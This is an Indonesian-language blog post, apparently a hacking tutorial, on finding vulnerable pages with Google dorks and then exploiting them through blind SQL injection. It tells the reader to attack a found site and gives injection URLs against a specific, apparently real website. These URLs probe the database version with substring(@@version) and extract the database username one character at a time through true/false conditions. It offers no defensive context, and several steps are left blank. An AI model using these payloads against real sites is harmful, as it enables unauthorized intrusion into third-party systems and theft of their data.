Cara Menebak Dork / Kata Kunci
07.16
Add Comment
- example : “http://target site/detail.php?id=***”
- Jadi Vuln filenya adalah : detail.php
Dork / Value's : (?)id=***
1. Setelah itu kita cari Di google dengan keyword :
2. Sebagai contoh saya mendapatkan hasil :
3. Buka new tab di browser anda, lalu attack site diatas :
- sama seperti sql injection,kita cari dulu lobangnya..
4. Setelah itu kita cari versi sql nya :
- http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,1,1)=5 << true
- jadi target diatas, merupakan sql versi 5
- nah gimana nebak next karakternya?
- SQL blind atacknya pakai looping dari a-z trus dari 1-9
5. Exploiting True/False conditions
- Select user returns ‘dbo’
- SUBSTRING(‘Select user’, 1, 1) = ‘d’
- SUBSTRING(‘Select user’, 2, 1) = ‘b’
- SUBSTRING(‘Select user’, 3, 1) = ‘o’
- http://www.amandawade.ca/detail.php?id=207679 and SUBSTRING(‘Select user’, 1, 1) = ‘d’ TRUE
- http://www.amandawade.ca/detail.php?id=207679 and SUBSTRING(‘Select user’, 1, 1) = ‘X’ FALSE
- Select user returns ‘dbo’
- SUBSTRING(‘Select user’, 1, 1) = ‘d’
- SUBSTRING(‘Select user’, 2, 1) = ‘b’
- SUBSTRING(‘Select user’, 3, 1) = ‘o’
- Jadi DB username nya : dbo